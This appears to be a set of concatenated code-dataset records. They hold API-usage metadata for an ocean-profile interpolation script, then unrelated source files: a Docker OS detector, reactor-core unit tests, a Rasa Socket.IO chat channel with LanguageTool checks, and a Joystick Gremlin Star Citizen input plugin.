"scipy.interpolate.interp1d",
"gsw.p_from_z",
"pandas.DataFrame",
"os.path.exists",
"numpy.transpose",
"tiles.tiles_with_halo",
"numpy.linspace",
"gsw.rho",
"computational.compute_weight",
"numpy.ceil",
"os.system",
"interp.read_profiles",
"gsw.grav",
"os.makedirs",
"numpy.deg2rad",
"numpy.zeros",
"tiles.read_argo_tile",
"gsw.sound_speed",
"pandas.read_pickle",
"numpy.sqrt"
] |
[((1512, 1567), 'computational.compute_weight', 'cpt.compute_weight', (['lonr[i]', 'latr[j]', 'LONr', 'LATr', 'resor'], {}), '(lonr[i], latr[j], LONr, LATr, resor)\n', (1530, 1567), True, 'import computational as cpt\n'), ((1579, 1627), 'pandas.DataFrame', 'pd.DataFrame', (['(0.0)'], {'columns': 'var_stats', 'index': 'zref'}), '(0.0, columns=var_stats, index=zref)\n', (1591, 1627), True, 'import pandas as pd\n'), ((2995, 3019), 'gsw.p_from_z', 'gsw.p_from_z', (['(-zref)', 'lat'], {}), '(-zref, lat)\n', (3007, 3019), False, 'import gsw\n'), ((3029, 3056), 'gsw.sound_speed', 'gsw.sound_speed', (['Si', 'Ti', 'pi'], {}), '(Si, Ti, pi)\n', (3044, 3056), False, 'import gsw\n'), ((3067, 3086), 'gsw.rho', 'gsw.rho', (['Si', 'Ti', 'pi'], {}), '(Si, Ti, pi)\n', (3074, 3086), False, 'import gsw\n'), ((3095, 3115), 'gsw.grav', 'gsw.grav', (['lat', 'pi[0]'], {}), '(lat, pi[0])\n', (3103, 3115), False, 'import gsw\n'), ((3180, 3210), 'scipy.interpolate.interp1d', 'interpolate.interp1d', (['zref', 'cs'], {}), '(zref, cs)\n', (3200, 3210), False, 'from scipy import interpolate\n'), ((3977, 4015), 'numpy.arange', 'np.arange', (['lonmin', '(lonmax + reso)', 'reso'], {}), '(lonmin, lonmax + reso, reso)\n', (3986, 4015), True, 'import numpy as np\n'), ((4024, 4062), 'numpy.arange', 'np.arange', (['latmin', '(latmax + reso)', 'reso'], {}), '(latmin, latmax + reso, reso)\n', (4033, 4062), True, 'import numpy as np\n'), ((4195, 4226), 'tiles.tiles_with_halo', 'tiles.tiles_with_halo', (['bb', 'tile'], {}), '(bb, tile)\n', (4216, 4226), False, 'import tiles\n'), ((4239, 4270), 'tiles.read_argo_tile', 'tiles.read_argo_tile', (['tile_list'], {}), '(tile_list)\n', (4259, 4270), False, 'import tiles\n'), ((4282, 4313), 'interp.read_profiles', 'interp.read_profiles', (['tile_list'], {}), '(tile_list)\n', (4302, 4313), False, 'import interp\n'), ((4807, 4822), 'numpy.deg2rad', 'np.deg2rad', (['LON'], {}), '(LON)\n', (4817, 4822), True, 'import numpy as np\n'), ((4834, 4849), 'numpy.deg2rad', 'np.deg2rad', (['LAT'], {}), '(LAT)\n', (4844, 4849), True, 'import numpy as np\n'), ((4861, 4876), 'numpy.deg2rad', 'np.deg2rad', (['lon'], {}), '(lon)\n', (4871, 4876), True, 'import numpy as np\n'), ((4888, 4903), 'numpy.deg2rad', 'np.deg2rad', (['lat'], {}), '(lat)\n', (4898, 4903), True, 'import numpy as np\n'), ((4916, 4932), 'numpy.deg2rad', 'np.deg2rad', (['reso'], {}), '(reso)\n', (4926, 4932), True, 'import numpy as np\n'), ((4998, 5024), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5006, 5024), True, 'import numpy as np\n'), ((5037, 5063), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5045, 5063), True, 'import numpy as np\n'), ((5076, 5102), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5084, 5102), True, 'import numpy as np\n'), ((5117, 5143), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5125, 5143), True, 'import numpy as np\n'), ((5158, 5184), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5166, 5184), True, 'import numpy as np\n'), ((5194, 5220), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5202, 5220), True, 'import numpy as np\n'), ((5229, 5255), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5237, 5255), True, 'import numpy as np\n'), ((6343, 6376), 'os.system', 'os.system', (["('rm %s' % monitor_file)"], {}), "('rm %s' % monitor_file)\n", (6352, 6376), False, 'import os\n'), 
((6488, 6505), 'os.path.exists', 'os.path.exists', (['f'], {}), '(f)\n', (6502, 6505), False, 'import os\n'), ((1339, 1356), 'os.path.exists', 'os.path.exists', (['d'], {}), '(d)\n', (1353, 1356), False, 'import os\n'), ((2265, 2287), 'numpy.sum', 'np.sum', (['weight'], {'axis': '(0)'}), '(weight, axis=0)\n', (2271, 2287), True, 'import numpy as np\n'), ((2323, 2350), 'numpy.sum', 'np.sum', (['(CT * weight)'], {'axis': '(0)'}), '(CT * weight, axis=0)\n', (2329, 2350), True, 'import numpy as np\n'), ((2364, 2396), 'numpy.sum', 'np.sum', (['(CT * CT * weight)'], {'axis': '(0)'}), '(CT * CT * weight, axis=0)\n', (2370, 2396), True, 'import numpy as np\n'), ((2438, 2475), 'numpy.sqrt', 'np.sqrt', (['((z2 - z0 * z0 / W) / (W - 1))'], {}), '((z2 - z0 * z0 / W) / (W - 1))\n', (2445, 2475), True, 'import numpy as np\n'), ((2511, 2538), 'numpy.sum', 'np.sum', (['(SA * weight)'], {'axis': '(0)'}), '(SA * weight, axis=0)\n', (2517, 2538), True, 'import numpy as np\n'), ((2579, 2608), 'numpy.sum', 'np.sum', (['(BVF2 * weight)'], {'axis': '(0)'}), '(BVF2 * weight, axis=0)\n', (2585, 2608), True, 'import numpy as np\n'), ((2622, 2658), 'numpy.sum', 'np.sum', (['(BVF2 * BVF2 * weight)'], {'axis': '(0)'}), '(BVF2 * BVF2 * weight, axis=0)\n', (2628, 2658), True, 'import numpy as np\n'), ((2673, 2710), 'numpy.sqrt', 'np.sqrt', (['((z2 - z0 * z0 / W) / (W - 1))'], {}), '((z2 - z0 * z0 / W) / (W - 1))\n', (2680, 2710), True, 'import numpy as np\n'), ((3701, 3728), 'numpy.ceil', 'np.ceil', (["(b['LONMIN'] / reso)"], {}), "(b['LONMIN'] / reso)\n", (3708, 3728), True, 'import numpy as np\n'), ((3745, 3773), 'numpy.floor', 'np.floor', (["(b['LONMAX'] / reso)"], {}), "(b['LONMAX'] / reso)\n", (3753, 3773), True, 'import numpy as np\n'), ((3790, 3817), 'numpy.ceil', 'np.ceil', (["(b['LATMIN'] / reso)"], {}), "(b['LATMIN'] / reso)\n", (3797, 3817), True, 'import numpy as np\n'), ((3834, 3862), 'numpy.floor', 'np.floor', (["(b['LATMAX'] / reso)"], {}), "(b['LATMAX'] / reso)\n", (3842, 3862), True, 'import numpy as np\n'), ((6319, 6337), 'pandas.to_pickle', 'pd.to_pickle', (['v', 'f'], {}), '(v, f)\n', (6331, 6337), True, 'import pandas as pd\n'), ((6522, 6539), 'pandas.read_pickle', 'pd.read_pickle', (['f'], {}), '(f)\n', (6536, 6539), True, 'import pandas as pd\n'), ((1401, 1415), 'os.makedirs', 'os.makedirs', (['d'], {}), '(d)\n', (1412, 1415), False, 'import os\n'), ((6581, 6610), 'numpy.transpose', 'np.transpose', (['data', '(2, 0, 1)'], {}), '(data, (2, 0, 1))\n', (6593, 6610), True, 'import numpy as np\n'), ((3453, 3484), 'numpy.linspace', 'np.linspace', (['zref[k - 1]', 'z', '(10)'], {}), '(zref[k - 1], z, 10)\n', (3464, 3484), True, 'import numpy as np\n'), ((3611, 3620), 'numpy.exp', 'np.exp', (['r'], {}), '(r)\n', (3617, 3620), True, 'import numpy as np\n')]
|
# Copyright 2019 Open Source Robotics Foundation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pexpect
from ast import literal_eval
from io import BytesIO as StringIO
from .core import get_docker_client
DETECTOR_DOCKERFILE = """
FROM python:3
RUN mkdir -p /tmp/distrovenv
RUN python3 -m venv /tmp/distrovenv
RUN . /tmp/distrovenv/bin/activate && pip install distro pyinstaller staticx
RUN apt-get update && apt-get install patchelf #needed for staticx
RUN echo 'import distro; print(distro.linux_distribution())' > /tmp/distrovenv/detect_os.py
RUN . /tmp/distrovenv/bin/activate && pyinstaller --onefile /tmp/distrovenv/detect_os.py
RUN . /tmp/distrovenv/bin/activate && staticx /dist/detect_os /dist/detect_os_static
"""
DETECTION_TEMPLATE = """
FROM rocker__detector as detector
FROM %(image_name)s
COPY --from=detector /dist/detect_os_static /tmp/detect_os
ENTRYPOINT [ "/tmp/detect_os" ]
CMD [ "" ]
"""
def build_detector_image(verbose=False):
    """Build the image used to detect the OS."""
    client = get_docker_client()
dockerfile_tag = 'rocker__detector'
iof = StringIO(DETECTOR_DOCKERFILE.encode())
    im = client.build(fileobj=iof, tag=dockerfile_tag)
log = []
for l in im:
log.append(l.decode())
success = False
    # Check for success: the "Successfully built" message is sometimes the
    # last log line and sometimes second-to-last, followed by the tag line.
    for l in log[-2:]:
if "Successfully built " in l:
success = True
if not success:
print("Failed to build image %s:\n>>>>\n%s\n>>>>>" % (dockerfile_tag, '\n'.join(log)))
elif verbose:
print("Successfully built image %s:\n>>>>\n%s\n>>>>>" % (dockerfile_tag, '\n'.join(log)))
return success
def detect_os(image_name):
client = get_docker_client()
dockerfile_tag = 'rocker__detection_%s' % image_name
iof = StringIO((DETECTION_TEMPLATE % locals()).encode())
    im = client.build(fileobj=iof, tag=dockerfile_tag)
for l in im:
pass
#print(l)
cmd="docker run -it --rm %s" % dockerfile_tag
p = pexpect.spawn(cmd)
output = p.read()
p.terminate()
if p.exitstatus == 0:
return literal_eval(output.decode().strip())
else:
return None
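

if __name__ == '__main__':
    # Hypothetical smoke test (added for illustration; not part of the
    # original file). Builds the detector image once, then probes a stock
    # image for its OS tuple; 'ubuntu:bionic' is just an example tag.
    if build_detector_image(verbose=True):
        print(detect_os('ubuntu:bionic'))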
|
[
"pexpect.spawn"
] |
[((2536, 2554), 'pexpect.spawn', 'pexpect.spawn', (['cmd'], {}), '(cmd)\n', (2549, 2554), False, 'import pexpect\n')]
|
import fridge.Core.Core as Core
import fridge.driver.global_variables as gb
global_vars = gb.GlobalVariables()
global_vars.read_input_file('Full_Core_Test')
def test_baseCore():
core = Core.Core()
assert core.name == ''
assert core.assemblyList == []
assert core.coreCoolant is None
assert core.reactorVessel is None
assert core.vesselThickness == 0
assert core.coolantSurfaceCard == ''
assert core.coolantCellCard == ''
assert core.materialCard == ''
assert core.vesselMaterial is None
assert core.vesselMaterialString == ''
assert core.coolantRadius == 0
assert core.coolantHeight == 0
assert core.coolantPosition == []
assert core.coolantMaterial is None
assert core.vesselRadius == 0
assert core.vesselPosition == []
assert core.vesselSurfaceCard == ''
assert core.coreCellList == []
assert core.coreSurfaceList == []
assert core.coreMaterialList == []
assert core.everythingElse is None
def test_getCoreData():
core = Core.Core()
core.read_core_data('Core_Test')
assert core.name == 'Test_Core'
assert core.vesselThickness == 10
assert core.vesselMaterialString == 'HT9'
global_vars = gb.GlobalVariables()
global_vars.read_input_file('Full_Core_Test', output_name='test', temperature=1200, void_per=0.001)
def test_perturbedCoreData():
core = Core.Core()
core.read_core_data('Core_Test')
assert global_vars.output_name == 'test'
assert global_vars.temperature == 1200
assert global_vars.void_per == 0.001
|
[
"fridge.Core.Core.Core",
"fridge.driver.global_variables.GlobalVariables"
] |
[((91, 111), 'fridge.driver.global_variables.GlobalVariables', 'gb.GlobalVariables', ([], {}), '()\n', (109, 111), True, 'import fridge.driver.global_variables as gb\n'), ((1205, 1225), 'fridge.driver.global_variables.GlobalVariables', 'gb.GlobalVariables', ([], {}), '()\n', (1223, 1225), True, 'import fridge.driver.global_variables as gb\n'), ((192, 203), 'fridge.Core.Core.Core', 'Core.Core', ([], {}), '()\n', (201, 203), True, 'import fridge.Core.Core as Core\n'), ((1020, 1031), 'fridge.Core.Core.Core', 'Core.Core', ([], {}), '()\n', (1029, 1031), True, 'import fridge.Core.Core as Core\n'), ((1369, 1380), 'fridge.Core.Core.Core', 'Core.Core', ([], {}), '()\n', (1378, 1380), True, 'import fridge.Core.Core as Core\n')]
|
import logging
import uuid
from typing import Optional, Text, Any, List, Dict, Iterable
from sanic import Blueprint, response
from sanic.request import Request
from rasa.core.channels.channel import InputChannel, UserMessage, OutputChannel
from socketio import AsyncServer
from apis.languagetool_api import LanguageTool
from apis.nlu_api import NLUApi
logger = logging.getLogger(__name__)
class RasaAppBlueprint(Blueprint):
"""
    Rasa Socket.IO channel for the socket connection with the client.
    Creates a sanic Blueprint to attach to the sanic server.
"""
def __init__(self, sio, socketio_path, *args, **kwargs):
self.sio = sio
self.socketio_path = socketio_path
super(RasaAppBlueprint, self).__init__(*args, **kwargs)
def register(self, app, options):
self.sio.attach(app, self.socketio_path)
super(RasaAppBlueprint, self).register(app, options)
class RasaAppOutput(OutputChannel):
"""
Rasa socket output channel
"""
@classmethod
def name(cls):
return "rasa_app"
def __init__(self, sio, sid, bot_message_evt, language_errors):
self.sio = sio
self.sid = sid
# socket.io events
self.bot_message_evt = bot_message_evt
# list of found language errors
self.language_errors = language_errors
async def _send_message(self, socket_id: Text, response: Any) -> None:
"""Sends a message to the recipient using the bot event."""
await self.sio.emit(self.bot_message_evt, response, room=socket_id)
async def send_text_message(
self, recipient_id: Text, text: Text, **kwargs: Any
) -> None:
"""Send a message through this channel."""
await self._send_message(self.sid, {"text": text})
async def send_language_errors_message(
self, recipient_id: Text, text: Text, **kwargs: Any
) -> None:
"""Send a list of errors detected by LanguageTool."""
await self._send_message(self.sid, {"text": text})
async def send_image_url(
self, recipient_id: Text, image: Text, **kwargs: Any
) -> None:
"""Sends an image to the output"""
message = {"attachment": {"type": "image", "payload": {"src": image}}}
await self._send_message(self.sid, message)
async def send_text_with_buttons(
self,
recipient_id: Text,
text: Text,
buttons: List[Dict[Text, Any]],
**kwargs: Any
) -> None:
"""Sends buttons to the output."""
message = {"text": text, "quick_replies": []}
for button in buttons:
message["quick_replies"].append(
{
"content_type": "text",
"title": button["title"],
"payload": button["payload"],
}
)
await self._send_message(self.sid, message)
async def send_elements(
self, recipient_id: Text, elements: Iterable[Dict[Text, Any]], **kwargs: Any
) -> None:
"""Sends elements to the output."""
for element in elements:
message = {
"attachment": {
"type": "template",
"payload": {"template_type": "generic", "elements": element},
}
}
await self._send_message(self.sid, message)
async def send_custom_json(
self, recipient_id: Text, json_message: Dict[Text, Any], **kwargs: Any
) -> None:
"""Sends custom json to the output"""
json_message.setdefault("room", self.sid)
await self.sio.emit(self.bot_message_evt, **json_message)
class RasaAppInput(InputChannel):
"""
Rasa socket.io input channel
"""
@classmethod
def name(cls):
return "rasa_app"
@classmethod
def from_credentials(cls, credentials):
credentials = credentials or {}
return cls(
credentials.get("user_message_evt", "user_uttered"),
credentials.get("bot_message_evt", "bot_uttered"),
credentials.get("bot_found_errors_evt", "bot_error_message"),
credentials.get("namespace"),
credentials.get("session_persistence", False),
credentials.get("socketio_path", "/socket.io"),
credentials.get("languagetool_url", "localhost"),
credentials.get("languagetool_port", "8082"),
)
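
    # Illustrative credentials.yml entry for this channel (assumed layout, not
    # taken from the original source; the top-level key is the module path
    # under which RasaAppInput is importable):
    #
    #   channels.rasa_app.RasaAppInput:
    #     bot_message_evt: "bot_uttered"
    #     bot_found_errors_evt: "bot_error_message"
    #     session_persistence: true
    #     languagetool_url: "localhost"
    #     languagetool_port: 8082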
def __init__(
self,
user_message_evt: Text = "user_uttered",
bot_message_evt: Text = "bot_uttered",
bot_found_errors_evt: Text = 'bot_error_message',
namespace: Optional[Text] = None,
session_persistence: bool = False,
socketio_path: Optional[Text] = "/socket.io",
languagetool_url: Text = "localhost",
languagetool_port: int = 8082,
nlu_url: Text = "localhost",
nlu_port: int = 5045,
):
self.bot_message_evt = bot_message_evt
self.session_persistence = session_persistence
self.user_message_evt = user_message_evt
self.bot_found_errors_evt = bot_found_errors_evt
self.namespace = namespace
self.socketio_path = socketio_path
self.languagetool_api = LanguageTool(languagetool_url, languagetool_port)
self.nlu_api = NLUApi(nlu_url, nlu_port)
def blueprint(self, on_new_message):
sio = AsyncServer(async_mode="sanic")
socketio_webhook = RasaAppBlueprint(
sio, self.socketio_path, "socketio_webhook", __name__
)
@socketio_webhook.route("/", methods=["GET"])
async def health(request: Request):
return response.json({"status": "ok"})
@sio.on("connect", namespace=self.namespace)
async def connect(sid, environ):
logger.debug("User {} connected to socketIO endpoint.".format(sid))
@sio.on("disconnect", namespace=self.namespace)
async def disconnect(sid):
logger.debug("User {} disconnected from socketIO endpoint.".format(sid))
@sio.on("session_request", namespace=self.namespace)
async def session_request(sid, data):
if data is None:
data = {}
if "session_id" not in data or data["session_id"] is None:
data["session_id"] = uuid.uuid4().hex
await sio.emit("session_confirm", data["session_id"], room=sid)
logger.debug("User {} connected to socketIO endpoint.".format(sid))
@sio.on("start_conversation", namespace=self.namespace)
async def start_conversation(sid, data):
if self.session_persistence:
if not data.get("session_id"):
logger.warning(
"A message without a valid sender_id "
"was received. This message will be "
"ignored. Make sure to set a proper "
"session id using the "
"`session_request` socketIO event."
)
return
sender_id = data["session_id"]
else:
sender_id = sid
output_channel = RasaAppOutput(sio, sid, self.bot_message_evt, [])
message = UserMessage(
"Hello!", output_channel, sender_id, input_channel=self.name()
)
await on_new_message(message)
@sio.on(self.user_message_evt, namespace=self.namespace)
async def handle_message(sid, data):
if self.session_persistence:
if not data.get("session_id"):
logger.warning(
"A message without a valid sender_id "
"was received. This message will be "
"ignored. Make sure to set a proper "
"session id using the "
"`session_request` socketIO event."
)
return
sender_id = data["session_id"]
else:
sender_id = sid
language_errors = []
# lt_response = None
try:
user_message = data["message"]
# Extract entities from the message
response_nlu = self.nlu_api.parse(user_message)
logger.info("NLU Response " + str(response_nlu))
logging.debug("response: " + str(response_nlu))
response_entities = response_nlu["entities"]
logging.debug("Entities NLU: " + str(response_entities))
# Check if text contains error
languagetool_response = self.languagetool_api.check_message(user_message)
logger.info("LanguageTool Response. " + str(languagetool_response))
languagetool_response.ignore_entity_errors(response_entities, ["name"])
language_errors = languagetool_response.get_languagetool_errors()
logging.debug("Errors found by LanguageTool: " + str(language_errors))
except (TypeError, ValueError):
logger.debug("Error occurred using LanguageTool")
if len(language_errors) > 0:
# Send found errors to the client
logger.debug("Errors: " + str(language_errors))
output_channel = RasaAppOutput(sio, sid, self.bot_found_errors_evt, language_errors)
await output_channel.send_language_errors_message(sender_id, language_errors)
output_channel = RasaAppOutput(sio, sid, self.bot_message_evt, language_errors)
message = UserMessage(
data["message"], output_channel, sender_id, input_channel=self.name()
)
await on_new_message(message)
return socketio_webhook
|
[
"uuid.uuid4",
"apis.nlu_api.NLUApi",
"socketio.AsyncServer",
"sanic.response.json",
"apis.languagetool_api.LanguageTool",
"logging.getLogger"
] |
[((362, 389), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (379, 389), False, 'import logging\n'), ((5294, 5343), 'apis.languagetool_api.LanguageTool', 'LanguageTool', (['languagetool_url', 'languagetool_port'], {}), '(languagetool_url, languagetool_port)\n', (5306, 5343), False, 'from apis.languagetool_api import LanguageTool\n'), ((5367, 5392), 'apis.nlu_api.NLUApi', 'NLUApi', (['nlu_url', 'nlu_port'], {}), '(nlu_url, nlu_port)\n', (5373, 5392), False, 'from apis.nlu_api import NLUApi\n'), ((5449, 5480), 'socketio.AsyncServer', 'AsyncServer', ([], {'async_mode': '"""sanic"""'}), "(async_mode='sanic')\n", (5460, 5480), False, 'from socketio import AsyncServer\n'), ((5720, 5751), 'sanic.response.json', 'response.json', (["{'status': 'ok'}"], {}), "({'status': 'ok'})\n", (5733, 5751), False, 'from sanic import Blueprint, response\n'), ((6375, 6387), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6385, 6387), False, 'import uuid\n')]
|
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Joystick Gremlin Star Citizen
(Complete Star Citizen 3.7 Joystick Gremlin Plugin)
(https://robertsspaceindustries.com/citizens/Game_Overture)
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
import gremlin
import scmap
import threading
import time
from gremlin.user_plugin import *
from gremlin.macro import *
mode = ModeVariable("Mode", "The mode to use for this mapping")
pvAimLeftRight = PhysicalInputVariable("Aim Thumbstick Left/Right",
"Aims left and right along an axis",
[gremlin.common.InputType.JoystickAxis])
pvAimUpDown = PhysicalInputVariable("Aim Thumbstick Up/Down",
"Aims up and down along an axis",
[gremlin.common.InputType.JoystickAxis])
pvResetAim = PhysicalInputVariable("Reset Aim",
"Reset gimble reticle button",
[gremlin.common.InputType.JoystickButton, gremlin.common.InputType.JoystickHat])
pvCycleAll = PhysicalInputVariable("Cycle All (back)",
"Cycle all targets. Hold to cycle backward",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvCycleNext = PhysicalInputVariable("Cycle Next Enemy (Friendly)",
"Cycle next enemy target. Hold to cycle next friendly",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvCyclePrev = PhysicalInputVariable("Cycle Previous Enemy (Friendly)",
"Cycle previous enemy target. Hold to cycle previous friendly",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvReticleFocus = PhysicalInputVariable("Reticle Focus (Pin Selected)",
"Target object under reticle. Hold to pin currently selected target",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvTargetNearest = PhysicalInputVariable("Target Nearest Hostile (Cycle Pinned)",
"Target nearest hostile. Hold to cycle next pinned target",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvSubTargetModifierKey = PhysicalInputVariable("Subtarget Modifer Key/Switch",
"When pressed/held, it cycles/resets subtarget instead of cycle/resets target",
[gremlin.common.InputType.JoystickButton])#, gremlin.common.InputType.JoystickHat])
pvDynamicZoomInOut = PhysicalInputVariable("Dynamic Zoom Axis",
"Zooms in and out cockpit view along an axis",
[gremlin.common.InputType.JoystickAxis])
pvScanningModeToggle = PhysicalInputVariable("Scanning Mode Toggle",
"Toggle scanning mode",
[gremlin.common.InputType.JoystickButton])
pvActivateScanning = PhysicalInputVariable("Activate Scanning",
"Activate scanning or something",
[gremlin.common.InputType.JoystickButton])
pvScanningIncreaseRadarAngle = PhysicalInputVariable("Increase Scanning Radar Angle",
"Increase Radar Angle for scans",
[gremlin.common.InputType.JoystickButton])
pvScanningDecreaseRadarAngle = PhysicalInputVariable("Decrease Scanning Radar Angle",
"Decrease Radar Angle for scans",
[gremlin.common.InputType.JoystickButton])
class JGSCTempo:
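    """Tempo (short vs. long press) helper for a physical button: a press
    released within `delay` seconds queues the short macro, while holding
    the button past `delay` queues the long macro instead."""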
def __init__(self, scmap_short, scmap_long):
self.delay = 0.5
self.start_time = 0
self.timer = None
shortActionPress = VJoyAction(scmap_short[1], gremlin.common.InputType.JoystickButton, scmap_short[0], True)
shortActionRelease = VJoyAction(scmap_short[1], gremlin.common.InputType.JoystickButton, scmap_short[0], False)
self.vBtnPressMacroShort = Macro()
self.vBtnPressMacroShort.add_action(shortActionPress)
self.vBtnPressMacroShort.pause(0.1)
self.vBtnPressMacroShort.add_action(shortActionRelease)
longActionPress = VJoyAction(scmap_long[1], gremlin.common.InputType.JoystickButton, scmap_long[0], True)
longActionRelease = VJoyAction(scmap_long[1], gremlin.common.InputType.JoystickButton, scmap_long[0], False)
self.vBtnPressMacroLong = Macro()
self.vBtnPressMacroLong.add_action(longActionPress)
self.vBtnPressMacroLong.pause(0.1)
self.vBtnPressMacroLong.add_action(longActionRelease)
def process_event(self, event):
if event.is_pressed:
self.start_time = time.time()
self.timer = threading.Timer(self.delay, self._long_press)
self.timer.start()
else:
if (self.start_time + self.delay) > time.time():
# Short press
self.timer.cancel()
MacroManager().queue_macro(self.vBtnPressMacroShort)
def _long_press(self):
MacroManager().queue_macro(self.vBtnPressMacroLong)
self.timer.cancel()
self.timer = None
aimLeftRightDecorator = pvAimLeftRight.create_decorator(mode.value)
@aimLeftRightDecorator.axis(pvAimLeftRight.input_id)
def onAxis(event, vjoy):
vjoy[scmap.AXIS_AimLeftRight[1]].axis(scmap.AXIS_AimLeftRight[0]).value = event.value
aimUpDownDecorator = pvAimUpDown.create_decorator(mode.value)
@aimUpDownDecorator.axis(pvAimUpDown.input_id)
def onAxis(event, vjoy):
vjoy[scmap.AXIS_AimUpDown[1]].axis(scmap.AXIS_AimUpDown[0]).value = event.value
resetAimDecorator = pvResetAim.create_decorator(mode.value)
@resetAimDecorator.button(pvResetAim.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ResetAim[1]].button(scmap.ResetAim[0]).is_pressed = event.is_pressed
cycleAllTempo = JGSCTempo(scmap.CycleAllTargets, scmap.CycleAllTargetsBack)
cycleAllDecorator = pvCycleAll.create_decorator(mode.value)
@cycleAllDecorator.button(pvCycleAll.input_id)
def onBtn(event):
cycleAllTempo.process_event(event)
cycleNextTempo = JGSCTempo(scmap.CycleHostileTargets, scmap.CycleFriendlyTargets)
cycleNextDecorator = pvCycleNext.create_decorator(mode.value)
@cycleNextDecorator.button(pvCycleNext.input_id)
def onBtn(event, vjoy, joy):
if joy[pvSubTargetModifierKey.device_guid].button(pvSubTargetModifierKey.input_id).is_pressed:
vjoy[scmap.CycleSubTarget[1]].button(scmap.CycleSubTarget[0]).is_pressed = event.is_pressed
else:
cycleNextTempo.process_event(event)
cyclePrevTempo = JGSCTempo(scmap.CycleHostileTargetsBack, scmap.CycleFriendlyTargetsBack)
cyclePrevDecorator = pvCyclePrev.create_decorator(mode.value)
@cyclePrevDecorator.button(pvCyclePrev.input_id)
def onBtn(event, vjoy, joy):
if joy[pvSubTargetModifierKey.device_guid].button(pvSubTargetModifierKey.input_id).is_pressed:
vjoy[scmap.CycleSubTargetBack[1]].button(scmap.CycleSubTargetBack[0]).is_pressed = event.is_pressed
else:
cyclePrevTempo.process_event(event)
reticleFocusTempo = JGSCTempo(scmap.ReticleFocus, scmap.PinFocusedTarget)
reticleFocusDecorator = pvReticleFocus.create_decorator(mode.value)
@reticleFocusDecorator.button(pvReticleFocus.input_id)
def onBtn(event, vjoy, joy):
if joy[pvSubTargetModifierKey.device_guid].button(pvSubTargetModifierKey.input_id).is_pressed:
vjoy[scmap.ResetSubTarget[1]].button(scmap.ResetSubTarget[0]).is_pressed = event.is_pressed
else:
reticleFocusTempo.process_event(event)
targetNearestTempo = JGSCTempo(scmap.TargetNearestHostile, scmap.CyclePinnedTargets)
targetNearestDecorator = pvTargetNearest.create_decorator(mode.value)
@targetNearestDecorator.button(pvTargetNearest.input_id)
def onBtn(event):
targetNearestTempo.process_event(event)
subTargetModifierKeyDecorator = pvSubTargetModifierKey.create_decorator(mode.value)
@subTargetModifierKeyDecorator.button(pvSubTargetModifierKey.input_id)
def onBtn(event, vjoy):
if not event.is_pressed:
vjoy[scmap.CycleSubTarget[1]].button(scmap.CycleSubTarget[0]).is_pressed = False
vjoy[scmap.CycleSubTargetBack[1]].button(scmap.CycleSubTargetBack[0]).is_pressed = False
vjoy[scmap.ResetSubTarget[1]].button(scmap.ResetSubTarget[0]).is_pressed = False
dynamicZoomInOutDecorator = pvDynamicZoomInOut.create_decorator(mode.value)
@dynamicZoomInOutDecorator.axis(pvDynamicZoomInOut.input_id)
def onAxis(event, vjoy):
vjoy[scmap.AXIS_DynamicZoomInAndOut[1]].axis(scmap.AXIS_DynamicZoomInAndOut[0]).value = event.value
scanningModeToggleDecorator = pvScanningModeToggle.create_decorator(mode.value)
@scanningModeToggleDecorator.button(pvScanningModeToggle.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ScanningModeToggle[1]].button(scmap.ScanningModeToggle[0]).is_pressed = event.is_pressed
activateScanningDecorator = pvActivateScanning.create_decorator(mode.value)
@activateScanningDecorator.button(pvActivateScanning.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ActivateScanning[1]].button(scmap.ActivateScanning[0]).is_pressed = event.is_pressed
scanningIncreaseRadarAngleDecorator = pvScanningIncreaseRadarAngle.create_decorator(mode.value)
@scanningIncreaseRadarAngleDecorator.button(pvScanningIncreaseRadarAngle.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ScanningIncreaseRadarAngle[1]].button(scmap.ScanningIncreaseRadarAngle[0]).is_pressed = event.is_pressed
scanningDecreaseRadarAngleDecorator = pvScanningDecreaseRadarAngle.create_decorator(mode.value)
@scanningDecreaseRadarAngleDecorator.button(pvScanningDecreaseRadarAngle.input_id)
def onBtn(event, vjoy):
vjoy[scmap.ScanningDecreaseRadarAngle[1]].button(scmap.ScanningDecreaseRadarAngle[0]).is_pressed = event.is_pressed
|
[
"threading.Timer"
] |
[((4877, 4922), 'threading.Timer', 'threading.Timer', (['self.delay', 'self._long_press'], {}), '(self.delay, self._long_press)\n', (4892, 4922), False, 'import threading\n')]
|
import _sk_fail; _sk_fail._("dis")
|
[
"_sk_fail._"
] |
[((17, 34), '_sk_fail._', '_sk_fail._', (['"""dis"""'], {}), "('dis')\n", (27, 34), False, 'import _sk_fail\n')]
|
import sys
sys.path.append( "../psml" )
from typeguard.importhook import install_import_hook
